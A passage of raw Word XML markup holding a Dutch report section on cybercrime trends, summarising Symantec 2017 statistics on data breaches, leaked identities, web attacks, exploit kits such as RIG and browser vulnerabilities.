        <w:t xml:space="preserve">Voor mijn onderzoek zijn de </w:t>
      </w:r>
      <w:r w:rsidR="00393BA5">
        <w:t>onderwerp</w:t>
      </w:r>
      <w:r w:rsidR="005D12DE">
        <w:t>en</w:t>
      </w:r>
      <w:r w:rsidR="00393BA5">
        <w:t xml:space="preserve"> Big </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00393BA5">
        <w:t>numbers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00393BA5">
        <w:t xml:space="preserve"> en Web attacks interessant</w:t>
      </w:r>
      <w:r w:rsidR="0012031D">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00D27C96">
        <w:t xml:space="preserve"> Ik zal deze twee onderwerpen toelichten met als doel een indruk te geven over hoe de cybercriminaliteit zich heeft </w:t>
      </w:r>
      <w:r w:rsidR="00403E02">
        <w:t>ontwikkeld</w:t>
      </w:r>
      <w:r w:rsidR="00CF15DA">
        <w:t xml:space="preserve"> in de afgelopen jaren.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E868C5" w14:textId="15D12651" w:rsidR="00A170A5" w:rsidRPr="005D323B" w:rsidRDefault="00A170A5" w:rsidP="002F05FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D323B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Big </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005D323B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Numbers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F0833EC" w14:textId="0650CABA" w:rsidR="000634D1" w:rsidRDefault="00F8094F" w:rsidP="002F05FE">
      <w:r>
        <w:t xml:space="preserve">Het hoofdstuk Big </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>numbers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C505A7">
        <w:t xml:space="preserve"> laat ons</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in getallen en illustraties</w:t>
      </w:r>
      <w:r w:rsidR="00C505A7">
        <w:t xml:space="preserve"> zien wat er in de afgelopen jaren is </w:t>
      </w:r>
      <w:r w:rsidR="00842DC6">
        <w:t>gebeurd</w:t>
      </w:r>
      <w:r w:rsidR="00C505A7">
        <w:t xml:space="preserve"> op gebied van cybercriminaliteit.</w:t>
      </w:r>
      <w:r w:rsidR="0092129C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006228D5">
        <w:t>Symantic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006228D5">
        <w:t xml:space="preserve"> heeft in het rapport gepubliceerd dat er in totaal 3943 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006228D5">
        <w:t>breaches</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006228D5">
        <w:t xml:space="preserve"> (schendingen) waren </w:t>
      </w:r>
      <w:r w:rsidR="00CF540B">
        <w:t>gepleegd</w:t>
      </w:r>
      <w:r w:rsidR="006228D5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CF540B">
        <w:t>door cybercriminelen</w:t>
      </w:r>
      <w:r w:rsidR="006228D5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CF540B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007475B6">
        <w:t xml:space="preserve">Een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007475B6">
        <w:t>breach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007475B6">
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="009773AE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00656A9D">
        <w:t xml:space="preserve">een vorm van een cyberaanval op een website die in </w:t>
      </w:r>
      <w:r w:rsidR="00347244">
        <w:t>het</w:t>
      </w:r>
      <w:r w:rsidR="00656A9D">
        <w:t xml:space="preserve"> bezit is van </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00656A9D">
        <w:t>privacy gevoelige</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00656A9D">
        <w:t xml:space="preserve"> data. Het doel is om die data te stelen. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B579E4">
        <w:t>DataBreachToday</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B579E4">
        <w:t xml:space="preserve"> een nieuws website die artikelen over cyber security publiceert heeft op 24 mei een artikel gepubliceerd over de data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B579E4">
        <w:t>breach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B579E4">
        <w:t xml:space="preserve"> op Target in 2013. De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B579E4">
        <w:t>bre</w:t>
      </w:r>
      <w:r w:rsidR="007B70AE">
        <w:t>ach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007B70AE">
        <w:t xml:space="preserve"> zorgde ervoor dat de pinpas informatie van 41 miljoen klanten werden uitgelekt.</w:t>
      </w:r>
      <w:r w:rsidR="00402339">
        <w:t xml:space="preserve"> Target heeft ingestemd om 18.5 miljoen aan schadevergoeding te betalen</w:t>
      </w:r>
      <w:r w:rsidR="008B42B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0021397B">
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0021397B">
        <w:t>databreachtoday</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00C82579">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00E3172E">
        <w:t xml:space="preserve"> Target</w:t>
      </w:r>
      <w:r w:rsidR="0021397B">
        <w:t>, 24 mei 2017]</w:t>
      </w:r>
      <w:r w:rsidR="00402339">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008B42B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001570DE">
        <w:t>Dit was een zijsprong naar nieuws artikel, maar het lijnt wel uit hoeveel schade een cyberaanval kan toe</w:t>
      </w:r>
      <w:r w:rsidR="006978F0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001570DE">
        <w:t>richten.</w:t>
      </w:r>
      <w:r w:rsidR="000634D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49CFF5ED" w14:textId="433BF222" w:rsidR="00D05425" w:rsidRDefault="002E649B" w:rsidP="002F05FE">
      <w:r>
        <w:t xml:space="preserve">Een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>breach</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is een serieuze </w:t>
      </w:r>
      <w:r w:rsidR="00127122">
        <w:t>zaak omdat het</w:t>
      </w:r>
      <w:r w:rsidR="007A250E">
        <w:t xml:space="preserve"> gaat om </w:t>
      </w:r>
      <w:r w:rsidR="00842DC6">
        <w:t>privacygevoelige</w:t>
      </w:r>
      <w:r w:rsidR="007A250E">
        <w:t xml:space="preserve"> data waar criminelen misbruikt van kunnen maken. </w:t>
      </w:r>
      <w:r w:rsidR="00C108D4">
        <w:t xml:space="preserve">Neem als voorbeeld identiteitsfraude, </w:t>
      </w:r>
      <w:r w:rsidR="00FA5A2B">
        <w:t xml:space="preserve">een veelvoorkomende criminele activiteit op de </w:t>
      </w:r>
      <w:r w:rsidR="00842DC6">
        <w:t>wereldwijde</w:t>
      </w:r>
      <w:r w:rsidR="00FA5A2B">
        <w:t xml:space="preserve"> web. </w:t>
      </w:r>
      <w:r w:rsidR="00EA4193">
        <w:t xml:space="preserve">In 2014 </w:t>
      </w:r>
      <w:r w:rsidR="00481FC2">
        <w:t>zijn er</w:t>
      </w:r>
      <w:r w:rsidR="00D53203">
        <w:t xml:space="preserve"> circa</w:t>
      </w:r>
      <w:r w:rsidR="00481FC2">
        <w:t xml:space="preserve"> 1.2 miljard identiteiten</w:t>
      </w:r>
      <w:r w:rsidR="0028002D">
        <w:t xml:space="preserve"> uitgelekt</w:t>
      </w:r>
      <w:r w:rsidR="00684F53">
        <w:t>, in 2015 564 miljoen en in 2016 1.1 miljard.</w:t>
      </w:r>
      <w:r w:rsidR="00B23DD3">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B23DD3">
        <w:t>Symantic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B23DD3">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B23DD3">
        <w:t>Breaches</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B23DD3">
        <w:t>, 2017</w:t>
      </w:r>
      <w:r w:rsidR="004F173A">
        <w:t>, p10</w:t>
      </w:r>
      <w:r w:rsidR="00B23DD3">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="005441BF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A12AC2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC7239" w14:textId="775F40D8" w:rsidR="00EB5A31" w:rsidRDefault="005C210F" w:rsidP="002F05FE">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251841536" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21573493" wp14:editId="012C2EFE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>245745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>458470</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5137785" cy="1898650"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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atistieken.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5137785" cy="1898650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C224939" w14:textId="1C479502" w:rsidR="00AF01A3" w:rsidRDefault="005C210F" w:rsidP="002F05FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251843584" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0926A0CC" wp14:editId="63A72529">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>252095</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2098040</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5137785" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="50" name="Text Box 50"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5137785" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="77A28623" w14:textId="0D96BB75" w:rsidR="00CE4BB5" w:rsidRPr="009C344C" w:rsidRDefault="00CE4BB5" w:rsidP="0038017D">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 3.3.1 symantec rapport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6A0CC" id="Text Box 50" o:spid="_x0000_s1051" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:19.85pt;margin-top:165.2pt;width:404.55pt;height:21.2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Iy2TgCAAB4BAAADgAAAGRycy9lMm9Eb2MueG1srFTBjtowEL1X6j9YvpcAFQuNCCvKiqoS2l0J&#10;qj0bxyGWbI9rGxL69R07Cdtue6p6MeOZ8ZvMezMs71utyEU4L8EUdDIaUyIMh1KaU0G/HbYfFpT4&#10;wEzJFBhR0Kvw9H71/t2ysbmYQg2qFI4giPF5Ywtah2DzLPO8Fpr5EVhhMFiB0yzg1Z2y0rEG0bXK&#10;puPxXdaAK60DLrxH70MXpKuEX1WCh6eq8iIQVVD8tpBOl85jPLPVkuUnx2wtef8Z7B++QjNpsOgN&#10;6oEFRs5O/gGlJXfgoQojDjqDqpJcpB6wm8n4TTf7mlmRekFyvL3R5P8fLH+8PDsiy4LOkB7DNGp0&#10;EG0gn6El6EJ+GutzTNtbTAwt+lHnwe/RGdtuK6fjLzZEMI5Q1xu7EY2jczb5OJ8vZpRwjE3vPi3m&#10;swiTvb62zocvAjSJRkEdqpdIZZedD13qkBKLeVCy3Eql4iUGNsqRC0Olm1oG0YP/lqVMzDUQX3WA&#10;nUekUemrxIa7xqIV2mObCJoshq6PUF6RDAfdOHnLtxLL75gPz8zh/GD/uBPhCY9KQVNQ6C1KanA/&#10;/uaP+SgrRilpcB4L6r+fmROUqK8GBY/DOxhuMI6DYc56A9j4BLfN8mTiAxfUYFYO9AuuyjpWwRAz&#10;HGsVNAzmJnRbgavGxXqdknBELQs7s7c8Qg80H9oX5mwvUkB5H2GYVJa/0arLTWrZ9Tkg8UnISGzH&#10;Ig5AvOB4p1HoVzHuz6/3lPX6h7H6CQAA//8DAFBLAwQUAAYACAAAACEABqvZU+IAAAAKAQAADwAA&#10;AGRycy9kb3ducmV2LnhtbEyPMU/DMBCFdyT+g3VILIg6NFGbhjhVVcFQlorQhc2Nr3EgtiPbacO/&#10;5zrBdLp7T+++V64n07Mz+tA5K+BplgBD2zjV2VbA4eP1MQcWorRK9s6igB8MsK5ub0pZKHex73iu&#10;Y8soxIZCCtAxDgXnodFoZJi5AS1pJ+eNjLT6lisvLxRuej5PkgU3srP0QcsBtxqb73o0AvbZ514/&#10;jKeXt02W+t1h3C6+2lqI+7tp8wws4hT/zHDFJ3SoiOnoRqsC6wWkqyU5aaZJBowMeZZTlyNdlvMV&#10;8Krk/ytUvwAAAP//AwBQSwECLQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAA&#10;AAAAAAAAACwBAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBwMjLZOAIAAHgEAAAOAAAAAAAA&#10;AAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAGq9lT4gAAAAoBAAAPAAAA&#10;AAAAAAAAAAAAAJAEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAAnwUAAAAA&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="77A28623" w14:textId="0D96BB75" w:rsidR="00CE4BB5" w:rsidRPr="009C344C" w:rsidRDefault="00CE4BB5" w:rsidP="0038017D">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 3.3.1 symantec rapport 2017</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A600485" w14:textId="15AA1325" w:rsidR="00AF01A3" w:rsidRDefault="00AF01A3" w:rsidP="002F05FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="609A4E96" w14:textId="77777777" w:rsidR="00AF01A3" w:rsidRDefault="00AF01A3" w:rsidP="002F05FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16E01904" w14:textId="13B7AB6C" w:rsidR="002B2EB7" w:rsidRPr="005D323B" w:rsidRDefault="009D39D1" w:rsidP="002F05FE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D323B">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Web in cijfers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2C6647" w14:textId="3A9F43F7" w:rsidR="007105CF" w:rsidRDefault="008A4359" w:rsidP="002F05FE">
      <w:r>
        <w:t xml:space="preserve">Symantec </w:t>
      </w:r>
      <w:r w:rsidR="0070479E">
        <w:t xml:space="preserve">heeft in </w:t>
      </w:r>
      <w:r w:rsidR="00842DC6">
        <w:t>het</w:t>
      </w:r>
      <w:r w:rsidR="0070479E">
        <w:t xml:space="preserve"> kader van web </w:t>
      </w:r>
      <w:r w:rsidR="008F4E2E">
        <w:t xml:space="preserve">gepubliceerd dat in de afgelopen drie jaren </w:t>
      </w:r>
      <w:r w:rsidR="00036A19">
        <w:t xml:space="preserve">meer dan 70% van alle scande websites kwetsbaarheden bevat waarvan 9 á 20 procent zorgwekkend is. </w:t>
      </w:r>
      <w:r w:rsidR="006D3EAA">
        <w:t xml:space="preserve">Symantec heeft een aantal belangrijke bevindingen gemaakt die een aantal zaken boven water halen. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785C71A1" w14:textId="12A094F7" w:rsidR="00896D42" w:rsidRDefault="0016292E" w:rsidP="002F05FE">
      <w:r>
        <w:t>Voor ik begin aan de bevindingen is het van bel</w:t>
      </w:r>
      <w:r w:rsidR="00896D42">
        <w:t xml:space="preserve">ang dat de lezer met de term </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00896D42">
        <w:t>Exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00896D42">
        <w:t xml:space="preserve"> Kit </w:t>
      </w:r>
      <w:r w:rsidR="00842DC6">
        <w:t>bekend</w:t>
      </w:r>
      <w:r w:rsidR="00896D42">
        <w:t xml:space="preserve"> wordt.</w:t>
      </w:r>
      <w:r w:rsidR="003D04F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D802467" w14:textId="76FF523F" w:rsidR="006D3EAA" w:rsidRDefault="00F30D85" w:rsidP="002F05FE">
      <w:r>
        <w:t xml:space="preserve">1) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00842DC6">
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00F93D07">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00842DC6">
        <w:t>aanvallen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008741EF">
        <w:t>, dit is een vorm van cyberaanvallen,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zijn met 32% gedaald over de afgelopen jaar</w:t>
      </w:r>
      <w:r w:rsidR="00E37E18">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A22990">
        <w:t xml:space="preserve">maar wat dit niet betekent is dat het geen groot probleem meer is. </w:t>
      </w:r>
      <w:r w:rsidR="005A49A1">
        <w:t>Gemiddeld werden er in 2016 iedere dag</w:t>
      </w:r>
      <w:r w:rsidR="0033257C">
        <w:t xml:space="preserve"> ongeveer </w:t>
      </w:r>
      <w:r w:rsidR="008741EF">
        <w:t xml:space="preserve">229,000 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00842DC6">
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="0014640F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00842DC6">
        <w:t>aanvallen</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008741EF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A49A1">
        <w:t>ontdekt</w:t>
      </w:r>
      <w:r w:rsidR="00F3561E">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A453C2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AE4EC8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006917DD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EC795A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008A2A66">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0033257C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F276B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005A49A1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F3561E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08014116" w14:textId="77777777" w:rsidR="00B1568F" w:rsidRDefault="007105CF" w:rsidP="002F05FE">
      <w:r>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidR="00A453C2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E27AF">
        <w:t>Exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E27AF">
        <w:t xml:space="preserve"> kits waren tot 2015 het meeste populairste</w:t>
      </w:r>
      <w:r w:rsidR="00455492">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB73C1">
        <w:t xml:space="preserve">manier om </w:t>
      </w:r>
      <w:r w:rsidR="004B74E3">
        <w:t>aanvallen te verrichten op website.</w:t>
      </w:r>
      <w:r w:rsidR="00AE1800">
        <w:t xml:space="preserve"> Maar in 2016 is het aantal aanvallen via EK gedaald met 60% en krijgt aanvallen via de email de voorkeur. </w:t>
      </w:r>
      <w:r w:rsidR="00377F58">
        <w:t>Dit betekent echt</w:t>
      </w:r>
      <w:r w:rsidR="00893327">
        <w:t xml:space="preserve">er niet dat </w:t>
      </w:r>
      <w:r w:rsidR="00377F58">
        <w:t>aanvallen op website</w:t>
      </w:r>
      <w:r w:rsidR="00893327">
        <w:t>s gedaald zijn,</w:t>
      </w:r>
      <w:r w:rsidR="00377F58">
        <w:t xml:space="preserve"> cybercriminelen gebruiken</w:t>
      </w:r>
      <w:r w:rsidR="00893327">
        <w:t xml:space="preserve"> simpel weg</w:t>
      </w:r>
      <w:r w:rsidR="00377F58">
        <w:t xml:space="preserve"> een ander methode om de </w:t>
      </w:r>
      <w:r w:rsidR="00E955D0">
        <w:t>aanvallen te verrichten</w:t>
      </w:r>
      <w:r w:rsidR="00893327">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332AAF47" w14:textId="20B6B34D" w:rsidR="0002499B" w:rsidRDefault="00B1568F" w:rsidP="002F05FE">
      <w:r>
        <w:t xml:space="preserve">3) </w:t>
      </w:r>
      <w:r w:rsidR="0016292E">
        <w:t xml:space="preserve">Van alle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0016292E">
        <w:t>Exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0016292E">
        <w:t xml:space="preserve"> Kits is RIG de meest populaire</w:t>
      </w:r>
      <w:r w:rsidR="00891D2E">
        <w:t xml:space="preserve"> en was verantwoordelijk voor 35% van alle </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00842DC6">
        <w:t>webaanvallen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00891D2E">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidR="00382A8C">
        <w:t xml:space="preserve">2016. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00382A8C">
        <w:t>Ransom.Cerber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E6E8E">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00382A8C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009E6E8E">
        <w:t xml:space="preserve">een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E6E8E">
        <w:t>ransomware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009E6E8E">
        <w:t xml:space="preserve"> malware, werd</w:t>
      </w:r>
      <w:r w:rsidR="00382A8C">
        <w:t xml:space="preserve"> voornamelijk door RIG </w:t>
      </w:r>
      <w:r w:rsidR="009E6E8E">
        <w:t>gedistribueerd</w:t>
      </w:r>
      <w:r w:rsidR="00382A8C">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DD089B" w14:textId="522D8B6D" w:rsidR="00BA2E92" w:rsidRPr="00332BA1" w:rsidRDefault="0002499B">
      <w:r>
        <w:t xml:space="preserve">4) </w:t>
      </w:r>
      <w:r w:rsidR="00B63B70">
        <w:t xml:space="preserve">Gemiddeld werden er 2.4 browser kwetsbaarheden per dag ontdekt in 2016. </w:t>
      </w:r>
      <w:r w:rsidR="00187E9D">
        <w:t>In 2015 waren dat er 3 per dag.</w:t>
      </w:r>
      <w:r w:rsidR="001E6978">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E6978">
        <w:t>Threatpost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E6978">
        <w:t xml:space="preserve"> heeft in december 2016 een artikel gepubliceerd over browser kwetsbaarheden. Het artikel ging over </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001E6978">
        <w:t>Google</w:t>
      </w:r>
      <w:r w:rsidR="00842DC6">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="001E6978">
        <w:t>s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001E6978">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00842DC6">
        <w:t>Chrome browser</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001E6978">
        <w:t xml:space="preserve"> en de kwets</w:t>
      </w:r>
      <w:r w:rsidR="00AE15F3">
        <w:t xml:space="preserve">baarheden waar het mee kampt. </w:t>
      </w:r>
